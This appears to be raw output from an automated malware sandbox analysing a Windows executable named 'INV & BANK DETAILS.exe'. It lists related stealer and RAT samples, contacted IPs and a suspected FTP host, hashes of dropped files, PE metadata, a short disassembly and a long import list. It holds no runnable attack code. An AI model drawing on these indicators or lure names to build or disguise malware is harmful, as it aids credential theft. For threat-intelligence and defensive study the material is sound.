                              208.95.112.1Halkbank_Ekstre.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              dens.exeGet hashmaliciousPython Stealer, Exela Stealer, Waltuhium GrabberBrowse
                              • ip-api.com/json
                              Sipari_.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              IgTdifcj7HukYrd.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              Orden de Compra No. 434565344657.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              Pr6Fu6VZK3.exeGet hashmaliciousUnknownBrowse
                              • ip-api.com/line/
                              Pr6Fu6VZK3.exeGet hashmaliciousUnknownBrowse
                              • ip-api.com/line/
                              #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                              • ip-api.com/line/?fields=hosting
                              Built.exeGet hashmaliciousBlank GrabberBrowse
                              • ip-api.com/line/?fields=hosting
                              main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                              • ip-api.com/json/
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ip-api.comHalkbank_Ekstre.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              dens.exeGet hashmaliciousPython Stealer, Exela Stealer, Waltuhium GrabberBrowse
                              • 208.95.112.1
                              Sipari_.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              IgTdifcj7HukYrd.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              Orden de Compra No. 434565344657.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              Pr6Fu6VZK3.exeGet hashmaliciousUnknownBrowse
                              • 208.95.112.1
                              Pr6Fu6VZK3.exeGet hashmaliciousUnknownBrowse
                              • 208.95.112.1
                              #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                              • 208.95.112.1
                              Built.exeGet hashmaliciousBlank GrabberBrowse
                              • 208.95.112.1
                              main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                              • 208.95.112.1
                              ftp.jeepcommerce.rsPO#150003191.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 195.252.110.253
                              dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 195.252.110.253
                              DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 195.252.110.253
                              RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 195.252.110.253
                              EgjKf0gmd1.exeGet hashmaliciousAgentTeslaBrowse
                              • 195.252.110.253
                              INVOICE SUBMISSION.exeGet hashmaliciousAgentTeslaBrowse
                              • 195.252.110.253
                              KM75Avr7PS.exeGet hashmaliciousAgentTeslaBrowse
                              • 195.252.110.253
                              Bm3Ux1o05M.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 195.252.110.253
                              25QpgTIExG.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 195.252.110.253
                              po89654.exeGet hashmaliciousAgentTeslaBrowse
                              • 195.252.110.253
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              TUT-ASUSHalkbank_Ekstre.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              dens.exeGet hashmaliciousPython Stealer, Exela Stealer, Waltuhium GrabberBrowse
                              • 208.95.112.1
                              Sipari_.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                              • 208.95.112.1
                              IgTdifcj7HukYrd.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              Orden de Compra No. 434565344657.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              Pr6Fu6VZK3.exeGet hashmaliciousUnknownBrowse
                              • 208.95.112.1
                              Pr6Fu6VZK3.exeGet hashmaliciousUnknownBrowse
                              • 208.95.112.1
                              #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                              • 208.95.112.1
                              Built.exeGet hashmaliciousBlank GrabberBrowse
                              • 208.95.112.1
                              BEOTEL-AShttpwwwbeotelnetRSPO#150003191.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 195.252.110.253
                              dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 195.252.110.253
                              DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 195.252.110.253
                              RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 195.252.110.253
                              belks.mips.elfGet hashmaliciousMiraiBrowse
                              • 62.108.98.183
                              belks.mpsl.elfGet hashmaliciousMiraiBrowse
                              • 62.108.98.157
                              belks.sh4.elfGet hashmaliciousMiraiBrowse
                              • 62.108.98.156
                              splsh4.elfGet hashmaliciousUnknownBrowse
                              • 217.26.70.40
                              atH4SE3Oi6.elfGet hashmaliciousMiraiBrowse
                              • 62.108.98.149
                              5tSAlF2WkT.elfGet hashmaliciousMiraiBrowse
                              • 62.108.98.197
                              No context
                              No context
                              Process:C:\Users\user\Desktop\INV & BANK DETAILS.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):270336
                              Entropy (8bit):7.901462455491795
                              Encrypted:false
                              SSDEEP:6144:aHWWzitzfBPzeF9iPykpuUZ6VSirgf5dPrN8W22IlTS7Bph1G:ZGitzpiXqJZ6VSygfXzN8swTv
                              MD5:F6B1961770568FD706059AEAFDBBDCEF
                              SHA1:EFAAB1E7DE0E7A766A5AAA224E25D321B362F514
                              SHA-256:9892695F07C445FAA1DD97AC618CFF70750C47BCD9151ACA6190CE125EE6EE03
                              SHA-512:C298047F2CC5A6CF391B9111ED59107EA267673DE4F6CC17753EC8FE8573F6D8A43DBE766D8060071B8E695D0B6D89CF25A9B7897364F191FA7636F242386302
                              Malicious:false
                              Reputation:low
                              Preview:t..LB72KIQJB..N9.J2V54B9.KLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBX.9YJ<I.:B.].m.6~.l."+1x>K6-@7X.!X:%#5.P.m#?,b1 ...avX[&\zFAK.2KMQJBB0^.tfC.K.3.*g=.I.h2/u3.&E..4.'.JnH.5.0.Lyn?4^3.0.z#L.D.<.w02lF.5.8)*n).GYJ2V54B9TKLA72KM$..'XN9Y.wV5xC=T?.Ag2KMQJBBX.9zK9W<4B.UKL.52KMQJm.XN9IJ2V.5B9T.LA'2KMSJBGXN9YJ2V04B9TKLA7ROMQNBB.u;YH2V.4B)TK\A72K]QJRBXN9YJ"V54B9TKLA72.XSJ.BXN99H22.5B9TKLA72KMQJBBXN9YJ2V54B9..MA+2KMQJBBXN9YJ2V54B9TKLA72KMQ.O@X.9YJ2V54B9TKL.62.LQJBBXN9YJ2V54B9TKLA72KMQJBl,+A-J2V-.C9T[LA7.JMQNBBXN9YJ2V54B9TkLAW.9)0>#BX.TYJ2.44BWTKL.62KMQJBBXN9YJ2.54..0*8 72K.aJBBxL9Y\2V5>@9TKLA72KMQJBB.N9.d@%GWB9T/.@72+OQJB@XN.[J2V54B9TKLA72.MQ.BBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJ
                              Process:C:\Users\user\Desktop\INV & BANK DETAILS.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):270336
                              Entropy (8bit):7.901462455491795
                              Encrypted:false
                              SSDEEP:6144:aHWWzitzfBPzeF9iPykpuUZ6VSirgf5dPrN8W22IlTS7Bph1G:ZGitzpiXqJZ6VSygfXzN8swTv
                              MD5:F6B1961770568FD706059AEAFDBBDCEF
                              SHA1:EFAAB1E7DE0E7A766A5AAA224E25D321B362F514
                              SHA-256:9892695F07C445FAA1DD97AC618CFF70750C47BCD9151ACA6190CE125EE6EE03
                              SHA-512:C298047F2CC5A6CF391B9111ED59107EA267673DE4F6CC17753EC8FE8573F6D8A43DBE766D8060071B8E695D0B6D89CF25A9B7897364F191FA7636F242386302
                              Malicious:false
                              Reputation:low
                              Preview:t..LB72KIQJB..N9.J2V54B9.KLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBX.9YJ<I.:B.].m.6~.l."+1x>K6-@7X.!X:%#5.P.m#?,b1 ...avX[&\zFAK.2KMQJBB0^.tfC.K.3.*g=.I.h2/u3.&E..4.'.JnH.5.0.Lyn?4^3.0.z#L.D.<.w02lF.5.8)*n).GYJ2V54B9TKLA72KM$..'XN9Y.wV5xC=T?.Ag2KMQJBBX.9zK9W<4B.UKL.52KMQJm.XN9IJ2V.5B9T.LA'2KMSJBGXN9YJ2V04B9TKLA7ROMQNBB.u;YH2V.4B)TK\A72K]QJRBXN9YJ"V54B9TKLA72.XSJ.BXN99H22.5B9TKLA72KMQJBBXN9YJ2V54B9..MA+2KMQJBBXN9YJ2V54B9TKLA72KMQ.O@X.9YJ2V54B9TKL.62.LQJBBXN9YJ2V54B9TKLA72KMQJBl,+A-J2V-.C9T[LA7.JMQNBBXN9YJ2V54B9TkLAW.9)0>#BX.TYJ2.44BWTKL.62KMQJBBXN9YJ2.54..0*8 72K.aJBBxL9Y\2V5>@9TKLA72KMQJBB.N9.d@%GWB9T/.@72+OQJB@XN.[J2V54B9TKLA72.MQ.BBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJBBXN9YJ2V54B9TKLA72KMQJ
                              Process:C:\Users\user\Desktop\INV & BANK DETAILS.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):14844
                              Entropy (8bit):7.591803852901394
                              Encrypted:false
                              SSDEEP:384:k9/R/PZ/8euym6Bo2EGqbJfFDZYqMqMEgqm:kR/PJ8euGBEV9jnm
                              MD5:4EE403215B7126BC53E33745CD6E14F2
                              SHA1:ED8EC7F7ED5FC140976BF2DF51CD78FA80D90C68
                              SHA-256:A082F83FAD28F4695FB2E9327303E3785A8AACCDB41571C70626726AC8A15BF5
                              SHA-512:165AF31F83E4E17E04B1CAB11F7AF363A5FFD23B663EF7099372239EC1C32A0A8CDAFBC59029BADAB9FA03CD3680BB7DFD3A15E746566EC0C210A3E1097034AB
                              Malicious:false
                              Reputation:low
                              Preview:EA06......3........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..
                              Process:C:\Users\user\Desktop\INV & BANK DETAILS.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):172054
                              Entropy (8bit):2.5805034344952813
                              Encrypted:false
                              SSDEEP:192:oUjxaM/0OCHqz+Q/muxDkrWRyBcyedHnCvd50GF2ikz8dWcZk4CNc/lWpSFIO8T6:i
                              MD5:6AA9F4477281AC0BF523FC93628551CB
                              SHA1:50DDEBEC4B1CA45B79DBC0DB88216E52F3DAFA82
                              SHA-256:A2326214D498A5077E9EC87C065E70FD5C02FA0DB6A34B0143D2A6DBFDEF58FA
                              SHA-512:B7C2F585027714D87D5F2C2C6AD169797A87F8A3EA0850F88E6EEF4D2C532259D05F352E5385B5534C4BF724E570B5BB5B961930AC62E48AA71A200597C35FE4
                              Malicious:false
                              Reputation:low
                              Preview:52110052110x52110552110552110852110b52110e52110c52110852110152110e52110c52110c52110c52110052110252110052110052110052110052110552110652110552110752110b52110852110652110b52110052110052110052110052110052110052110652110652110852110952110452110552110852110452110b52110952110652110552110052110052110052110052110052110052110652110652110852110952110452110d52110852110652110b52110a52110752110252110052110052110052110052110052110052110652110652110852110952110552110552110852110852110b52110852110652110e52110052110052110052110052110052110052110652110652110852110952110452110552110852110a52110b52110952110652110552110052110052110052110052110052110052110652110652110852110952110452110d52110852110c52110b52110a52110652110c52110052110052110052110052110052110052110652110652110852110952110552110552110852110e52110b52110852110352110352110052110052110052110052110052110052110652110652110852110952110452110552110952110052110b52110952110352110252110052110052110052110052110052110052110652110652110852110952110452110d5211
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.19205410730038
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:INV & BANK DETAILS.exe
                              File size:949'887 bytes
                              MD5:fc4da7be71ac1824d53d208381e5cdf9
                              SHA1:bb5a2e6eb6d4b001e3096bed7d3b9e9224731cc4
                              SHA256:4f832525b2ee96d1b31269451bf6576002e8c02f9496f596c4c1bb3ce3ac0b15
                              SHA512:5a23533f1b7ba62f786785bd78b6d0a308d1ef39f09b958711ed92b71e7ccf0fdedbc3a8eaa5993afee05b4d2a95be52692ac413fc79ac22566e2c27c1e191ae
                              SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCYuYZLDJfJmrrz:7JZoQrbTFZY1iaC7YtRErrz
                              TLSH:C515C022F5C69036C2B323B19E7EF7A9963D79360336D29727C82D315EA05416B29733
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                              Icon Hash:1733312925935517
                              Entrypoint:0x4165c1
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                              Instruction
                              call 00007FD5B8D2E58Bh
                              jmp 00007FD5B8D253FEh
                              int3
                              int3
                              int3
                              int3
                              int3
                              push ebp
                              mov ebp, esp
                              push edi
                              push esi
                              mov esi, dword ptr [ebp+0Ch]
                              mov ecx, dword ptr [ebp+10h]
                              mov edi, dword ptr [ebp+08h]
                              mov eax, ecx
                              mov edx, ecx
                              add eax, esi
                              cmp edi, esi
                              jbe 00007FD5B8D2557Ah
                              cmp edi, eax
                              jc 00007FD5B8D25716h
                              cmp ecx, 00000080h
                              jc 00007FD5B8D2558Eh
                              cmp dword ptr [004A9724h], 00000000h
                              je 00007FD5B8D25585h
                              push edi
                              push esi
                              and edi, 0Fh
                              and esi, 0Fh
                              cmp edi, esi
                              pop esi
                              pop edi
                              jne 00007FD5B8D25577h
                              jmp 00007FD5B8D25952h
                              test edi, 00000003h
                              jne 00007FD5B8D25586h
                              shr ecx, 02h
                              and edx, 03h
                              cmp ecx, 08h
                              jc 00007FD5B8D2559Bh
                              rep movsd
                              jmp dword ptr [00416740h+edx*4]
                              mov eax, edi
                              mov edx, 00000003h
                              sub ecx, 04h
                              jc 00007FD5B8D2557Eh
                              and eax, 03h
                              add ecx, eax
                              jmp dword ptr [00416654h+eax*4]
                              jmp dword ptr [00416750h+ecx*4]
                              nop
                              jmp dword ptr [004166D4h+ecx*4]
                              nop
                              inc cx
                              add byte ptr [eax-4BFFBE9Ah], dl
                              inc cx
                              add byte ptr [ebx], ah
                              ror dword ptr [edx-75F877FAh], 1
                              inc esi
                              add dword ptr [eax+468A0147h], ecx
                              add al, cl
                              jmp 00007FD5BB19DD77h
                              add esi, 03h
                              add edi, 03h
                              cmp ecx, 08h
                              jc 00007FD5B8D2553Eh
                              rep movsd
                              jmp dword ptr [00000000h+edx*4]
                              Programming Language:
                              • [ C ] VS2010 SP1 build 40219
                              • [C++] VS2010 SP1 build 40219
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [ASM] VS2010 SP1 build 40219
                              • [RES] VS2010 SP1 build 40219
                              • [LNK] VS2010 SP1 build 40219
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                              RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                              RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                              RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                              RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                              RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                              RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                              RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                              RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                              RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                              RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                              RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                              DLLImport
                              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                              USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, 